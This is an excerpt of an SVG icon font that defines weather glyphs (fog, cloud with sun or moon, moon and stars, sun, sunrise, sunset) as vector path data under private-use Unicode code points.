<glyph unicode="&#xeb00;" glyph-name="cloud-fog" d="M96.459 307.769c-0.304 4.037-0.459 8.116-0.459 12.231 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 4.246 0.118 8.465 0.351 12.653v0c-0.23 1.079-0.351 2.199-0.351 3.347 0 1.941 0.363 3.824 1.026 5.574 10.855 113.59 106.54 202.426 222.974 202.426 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0c56.585-24.664 96.021-81.082 96.021-146.735 0-4.115-0.156-8.194-0.462-12.232 0.301-1.208 0.462-2.47 0.462-3.768 0-2.491-0.594-4.885-1.65-7.028-11.18-77.326-77.809-136.972-158.332-136.972h-544.036c-80.735 0-147.251 59.559-158.353 137.053-1.036 2.101-1.629 4.458-1.629 6.947 0 1.29 0.159 2.553 0.459 3.769v0zM128 320h800c0 11.050-1.406 21.772-4.047 32h-791.905c-2.642-10.232-4.048-20.956-4.048-32zM132.047 288c2.932-11.353 7.386-22.096 13.13-32v0h765.65c5.743 9.908 10.195 20.652 13.125 32h-791.905zM272.889 608c-8.781-9.811-16.568-20.531-23.203-32v0h332.628c-6.635 11.469-14.422 22.189-23.203 32h-286.222zM309.831 640h212.339c-30.41 20.219-66.914 32-106.169 32s-75.76-11.781-106.169-32zM235.205 544.785c-3.775-10.533-6.655-21.492-8.55-32.785v0h597.151c-4.027 11.393-9.447 22.128-16.055 32h-567.489c-1.767 0-3.467 0.276-5.058 0.785v0 0zM597.483 576h181.035c-24.732 20.013-56.225 32-90.517 32s-65.786-11.987-90.517-32zM224 480c0-10.903 0.909-21.593 2.655-32h604.466c0.581 5.253 0.879 10.592 0.879 16s-0.298 10.747-0.879 16h-607.121zM172.013 416.52c-10.636-9.264-19.728-20.251-26.84-32.52v0h765.65c-7.119 12.275-16.219 23.261-26.858 32.522-1.285-0.34-2.633-0.522-4.022-0.522h-703.886c-1.393 0-2.749 0.181-4.044 0.52v0 0zM171.439 224c22.598-19.916 52.251-32 84.651-32h543.82c32.458 0 62.097 12.095 84.67 32h-713.141z" />
<glyph unicode="&#xeb01;" glyph-name="cloud-fog2" d="M956.789 288c2.105 10.343 3.211 21.045 3.211 32h-864c0-10.959 1.099-21.66 3.193-32h857.597zM946.655 256c-4.999-11.421-11.293-22.15-18.697-32v0l-799.957-0.094c-7.417 9.873-13.718 20.633-18.716 32.094h837.37zM572.767 640c8.275-8.109 15.923-16.854 22.866-26.157 26.849 16.586 58.49 26.157 92.367 26.157 37.677 0 72.589-11.839 101.219-32v0h-557.068c8.022 11.501 17.096 22.214 27.082 32h313.535zM531.443 672c-33.713 20.314-73.213 32-115.443 32s-81.729-11.686-115.443-32h230.886zM823.771 576c8.116-9.827 15.186-20.551 21.038-32v0h-643.533c3.288 11.048 7.405 21.739 12.28 32h610.215zM857.375 512c2.917-10.313 4.917-21.011 5.908-32v0h-671.283c0 10.865 0.774 21.549 2.268 32h663.107zM896 448.077c12.151-9.118 22.956-19.927 32.070-32.077v0h-800.028c9.105 12.113 19.889 22.896 32.005 32l735.952 0.077zM946.716 384c4.431-10.16 7.838-20.87 10.092-32v0h-857.597c2.265 11.126 5.687 21.837 10.135 32h837.37zM895.952 192c-26.729-20.084-59.944-32-95.934-32h-544.036c-36.098 0-69.354 11.907-96.085 32h736.055z" />
<glyph unicode="&#xeb02;" glyph-name="-cloud-sun-fog" d="M959.538 211.768v0c0.301-1.208 0.462-2.47 0.462-3.768 0-2.491-0.594-4.885-1.65-7.028-11.18-77.326-77.809-136.972-158.332-136.972h-544.036c-80.735 0-147.251 59.559-158.353 137.053-1.036 2.101-1.629 4.458-1.629 6.947 0 1.29 0.159 2.553 0.459 3.769-0.304 4.037-0.459 8.116-0.459 12.231 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 4.246 0.118 8.465 0.351 12.653-0.23 1.079-0.351 2.199-0.351 3.347 0 1.941 0.363 3.824 1.026 5.574v0c10.855 113.59 106.54 202.426 222.974 202.426 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-4.115-0.156-8.194-0.462-12.232zM128 224h800c0 11.050-1.406 21.772-4.047 32h-791.905c-2.642-10.232-4.048-20.956-4.048-32zM132.047 192c2.932-11.353 7.386-22.096 13.13-32v0h765.65c5.743 9.908 10.195 20.652 13.125 32h-791.905zM272.889 512c-8.781-9.811-16.568-20.531-23.203-32v0h332.628c-6.635 11.469-14.422 22.189-23.203 32h-286.222zM309.831 544h212.339c-30.41 20.219-66.914 32-106.169 32s-75.76-11.781-106.169-32zM235.205 448.785c-3.775-10.533-6.655-21.492-8.55-32.785v0h597.151c-4.027 11.393-9.447 22.128-16.055 32h-567.489c-1.767 0-3.467 0.276-5.058 0.785v0 0zM597.483 480h181.035c-24.732 20.013-56.225 32-90.517 32s-65.786-11.987-90.517-32zM224 384c0-10.903 0.909-21.593 2.655-32h604.466c0.581 5.253 0.879 10.592 0.879 16s-0.298 10.747-0.879 16h-607.121zM172.013 320.52c-10.636-9.264-19.728-20.251-26.84-32.52v0h765.65c-7.119 12.275-16.219 23.261-26.858 32.522-1.285-0.34-2.633-0.522-4.022-0.522h-703.886c-1.393 0-2.749 0.181-4.044 0.52v0 0zM171.439 128c22.598-19.916 52.251-32 84.651-32h543.82c32.458 0 62.097 12.095 84.67 32h-713.141zM767.966 524.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0 0zM624 832c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 742.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 527.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 742.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeb03;" glyph-name="-cloud-sun-fog2" d="M99.211 256c2.265 11.126 5.687 21.837 10.135 32v0h837.37c4.431-10.16 7.838-20.87 10.092-32h-857.597zM96 224c0-10.959 1.099-21.66 3.193-32v0h857.597c2.105 10.343 3.211 21.045 3.211 32h-864zM259.233 544c-9.986-9.786-19.060-20.499-27.082-32v0h567.132c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-42.229 0-81.729-11.686-115.443-32h230.886c-11.308 6.814-23.267 12.657-35.762 17.414 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173v0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-6.943 9.303-14.591 18.048-22.866 26.157h-313.535zM213.556 480c-4.875-10.261-8.992-20.952-12.28-32v0h643.533c-5.853 11.449-12.922 22.173-21.038 32h-610.215zM194.268 416c-1.495-10.451-2.268-21.135-2.268-32v0h671.283c-0.99 10.989-2.991 21.687-5.908 32h-663.107zM160.048 352c-12.116-9.104-22.9-19.887-32.005-32v0h800.028c-9.114 12.15-19.92 22.959-32.070 32.077v-0.077h-735.952zM128 127.906c-7.417 9.873-13.718 20.633-18.716 32.094v0h837.37c-4.999-11.421-11.293-22.15-18.697-32l-799.957-0.094zM159.897 96c26.731-20.093 59.986-32 96.085-32h544.036c35.991 0 69.206 11.916 95.934 32h-736.055zM624 832c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 742.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 527.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 742.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeb04;" glyph-name="cloud-moon-fog" d="M959.538 211.941v0c0.301-1.208 0.462-2.47 0.462-3.768 0-2.491-0.594-4.885-1.65-7.028-11.18-77.326-77.809-136.972-158.332-136.972h-544.036c-80.735 0-147.251 59.559-158.353 137.053-1.036 2.101-1.629 4.458-1.629 6.947 0 1.29 0.159 2.553 0.459 3.769-0.304 4.037-0.459 8.116-0.459 12.231 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 4.246 0.118 8.465 0.351 12.653-0.23 1.079-0.351 2.199-0.351 3.347 0 1.941 0.363 3.824 1.026 5.574v0c10.855 113.59 106.54 202.426 222.974 202.426 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-4.115-0.156-8.194-0.462-12.232zM128 224.173h800c0 11.050-1.406 21.772-4.047 32h-791.905c-2.642-10.232-4.048-20.956-4.048-32zM132.047 192.173c2.932-11.353 7.386-22.096 13.13-32v0h765.65c5.743 9.908 10.195 20.652 13.125 32h-791.905zM272.889 512.173c-8.781-9.811-16.568-20.531-23.203-32v0h332.628c-6.635 11.469-14.422 22.189-23.203 32h-286.222zM309.831 544.173h212.339c-30.41 20.219-66.914 32-106.169 32s-75.76-11.781-106.169-32zM235.205 448.958c-3.775-10.533-6.655-21.492-8.55-32.785v0h597.151c-4.027 11.393-9.447 22.128-16.055 32h-567.489c-1.767 0-3.467 0.276-5.058 0.785v0 0zM597.483 480.173h181.035c-24.732 20.013-56.225 32-90.517 32s-65.786-11.987-90.517-32zM224 384.173c0-10.903 0.909-21.593 2.655-32h604.466c0.581 5.253 0.879 10.592 0.879 16s-0.298 10.747-0.879 16h-607.121zM172.013 320.693c-10.636-9.264-19.728-20.251-26.84-32.52v0h765.65c-7.119 12.275-16.219 23.261-26.858 32.522-1.285-0.34-2.633-0.522-4.022-0.522h-703.886c-1.393 0-2.749 0.181-4.044 0.52v0 0zM171.439 128.173c22.598-19.916 52.251-32 84.651-32h543.82c32.458 0 62.097 12.095 84.67 32h-713.141zM783.265 516.186c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0 0z" />
<glyph unicode="&#xeb05;" glyph-name="cloud-moon-fog2" d="M99.211 256c2.265 11.126 5.687 21.837 10.135 32v0h837.37c4.431-10.16 7.838-20.87 10.092-32h-857.597zM96 224c0-10.959 1.099-21.66 3.193-32v0h857.597c2.105 10.343 3.211 21.045 3.211 32h-864zM259.233 544c-9.986-9.786-19.060-20.499-27.082-32v0h591.621c16.419 19.881 28.555 43.429 34.997 69.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-42.229 0-81.729-11.686-115.443-32h251.637c-5.306 15.013-8.194 31.169-8.194 48 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159v0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-6.943 9.303-14.591 18.048-22.866 26.157h-313.535zM213.556 480c-4.875-10.261-8.992-20.952-12.28-32v0h643.533c-5.853 11.449-12.922 22.173-21.038 32h-610.215zM194.268 416c-1.495-10.451-2.268-21.135-2.268-32v0h671.283c-0.99 10.989-2.991 21.687-5.908 32h-663.107zM160.048 352c-12.116-9.104-22.9-19.887-32.005-32v0h800.028c-9.114 12.15-19.92 22.959-32.070 32.077v-0.077h-735.952zM128 127.906c-7.417 9.873-13.718 20.633-18.716 32.094v0h837.37c-4.999-11.421-11.293-22.15-18.697-32l-799.957-0.094zM159.897 96c26.731-20.093 59.986-32 96.085-32h544.036c35.991 0 69.206 11.916 95.934 32h-736.055z" />
<glyph unicode="&#xeb06;" glyph-name="moon-stars" d="M582.857 583.619l-38.857-103.619-38.857 103.619-73.143 24.381 73.143 24.381 38.857 103.619 38.857-103.619 73.143-24.381-73.143-24.381zM710.857 376.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM474.768 245.405v0c2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-97.202 78.798-176 176-176 82.452 0 151.662 56.698 170.768 133.232zM160 288.173c0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-19.719-56.019-73.104-96.173-135.867-96.173-79.529 0-144 64.471-144 144v0zM859.755 562.286l52.245-18.286-52.245-18.286-27.755-77.714-27.755 77.714-52.245 18.286 52.245 18.286 27.755 77.714 27.755-77.714z" />
<glyph unicode="&#xeb07;" glyph-name="moon-stars2" d="M582.857 583.619l-38.857-103.619-38.857 103.619-73.143 24.381 73.143 24.381 38.857 103.619 38.857-103.619 73.143-24.381-73.143-24.381zM710.857 376.381l-38.857 103.619-38.857-103.619-73.143-24.381 73.143-24.381 38.857-103.619 38.857 103.619 73.143 24.381-73.143 24.381zM474.768 245.405c-19.106-76.535-88.316-133.232-170.768-133.232-97.202 0-176 78.798-176 176 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901v0zM859.755 562.286l52.245-18.286-52.245-18.286-27.755-77.714-27.755 77.714-52.245 18.286 52.245 18.286 27.755 77.714 27.755-77.714z" />
<glyph unicode="&#xeb08;" glyph-name="moon" d="M698.768 389.405v0c2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-97.202 78.798-176 176-176 82.452 0 151.662 56.698 170.768 133.232zM384 432.173c0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-19.719-56.019-73.104-96.173-135.867-96.173-79.529 0-144 64.471-144 144v0z" />
<glyph unicode="&#xeb09;" glyph-name="moon2" d="M698.768 389.405c-19.106-76.535-88.316-133.232-170.768-133.232-97.202 0-176 78.798-176 176 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901z" />
<glyph unicode="&#xeb0a;" glyph-name="sun2" d="M528.93 256v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM528.93 288c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0zM528.93 736c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM744.548 646.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM833.859 431.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM744.548 215.452c6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104v0zM528.93 126.141c8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852v0zM313.312 215.452c6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523v0zM224 431.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0zM313.312 646.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeb0b;" glyph-name="sun3" d="M528.93 256c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0zM528.93 736c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM744.548 646.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM833.859 431.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM744.548 215.452c6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104v0zM528.93 126.141c8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852v0zM313.312 215.452c6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523v0zM224 431.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0zM313.312 646.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeb0c;" glyph-name="sunrise" d="M241.192 256c-8.982 0-16.263-7.422-16.263-16 0-8.837 7.252-16 16.263-16h194.404l93.333 80 93.333-80h194.404c8.982 0 16.263 7.422 16.263 16 0 8.837-7.252 16-16.263 16h-175.737l-112 96-112-96h-175.737zM703.283 320c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176s-176-78.798-176-176c0-5.393 0.243-10.73 0.717-16h32.161c-0.581 5.253-0.879 10.592-0.879 16 0 79.529 64.471 144 144 144s144-64.471 144-144c0-5.408-0.298-10.747-0.879-16h32.161zM528.93 640c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0 0zM744.548 550.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0 0zM833.859 335.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0 0zM224 335.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0 0zM313.312 550.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0 0z" />
<glyph unicode="&#xeb0d;" glyph-name="sunrise2" d="M435.596 320h-81.949c-0.475 5.27-0.717 10.607-0.717 16 0 97.202 78.798 176 176 176s176-78.798 176-176c0-5.393-0.243-10.73-0.717-16v0h-81.949l-93.333 80-93.333-80zM528.93 640c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0 0zM744.548 550.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0 0zM833.859 335.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0 0zM224 335.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0 0zM242.122 256c-8.982 0-16.263-7.422-16.263-16 0-8.837 7.252-16 16.263-16h194.404l93.333 80 93.333-80h194.404c8.982 0 16.263 7.422 16.263 16 0 8.837-7.252 16-16.263 16h-175.737l-112 96-112-96h-175.737zM313.312 550.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0 0z" />
<glyph unicode="&#xeb0e;" glyph-name="sunset" d="M704.212 384c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176s-176-78.798-176-176c0-5.393 0.243-10.73 0.717-16h32.161c-0.581 5.253-0.879 10.592-0.879 16 0 79.529 64.471 144 144 144s144-64.471 144-144c0-5.408-0.298-10.747-0.879-16h32.161zM528.93 704c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0 0zM744.548 614.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0 0zM833.859 399.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0 0zM224 399.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0 0zM313.312 614.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0 0zM241.192 288c-8.982 0-16.263 7.422-16.263 16 0 8.837 7.252 16 16.263 16h194.404l93.333-80 93.333 80h194.404c8.982 0 16.263-7.422 16.263-16 0-8.837-7.252-16-16.263-16h-175.737l-112-96-112 96h-175.737z" />
<glyph unicode="&#xeb0f;" glyph-name="sunset2" d="M703.283 384c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176s-176-78.798-176-176c0-5.393 0.243-10.73 0.717-16h350.565zM528 704c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0 0zM743.618 614.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0 0zM832.93 399.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0 0zM223.070 399.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0 0zM312.382 614.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0 0zM241.192 288c-8.982 0-16.263 7.422-16.263 16 0 8.837 7.252 16 16.263 16h194.404l93.333-80 93.333 80h194.404c8.982 0 16.263-7.422 16.263-16 0-8.837-7.252-16-16.263-16h-175.737l-112-96-112 96h-175.737z" />
<glyph unicode="&#xeb10;" glyph-name="sunset3" d="M704.212 320c0.475 5.27 0.717 10.607 0.717 16 0 97.202-78.798 176-176 176s-176-78.798-176-176c0-5.393 0.243-10.73 0.717-16h32.161c-0.581 5.253-0.879 10.592-0.879 16 0 79.529 64.471 144 144 144s144-64.471 144-144c0-5.408-0.298-10.747-0.879-16h32.161zM528.93 640c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM744.548 550.688c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM833.859 335.070c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM224 335.070c0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16 0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16v0zM313.312 550.688c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0zM241.192 256c-8.982 0-16.263-7.422-16.263-16v0c0-8.837 7.252-16 16.263-16h575.475c8.982 0 16.263 7.422 16.263 16v0c0 8.837-7.252 16-16.263 16h-575.475z" />
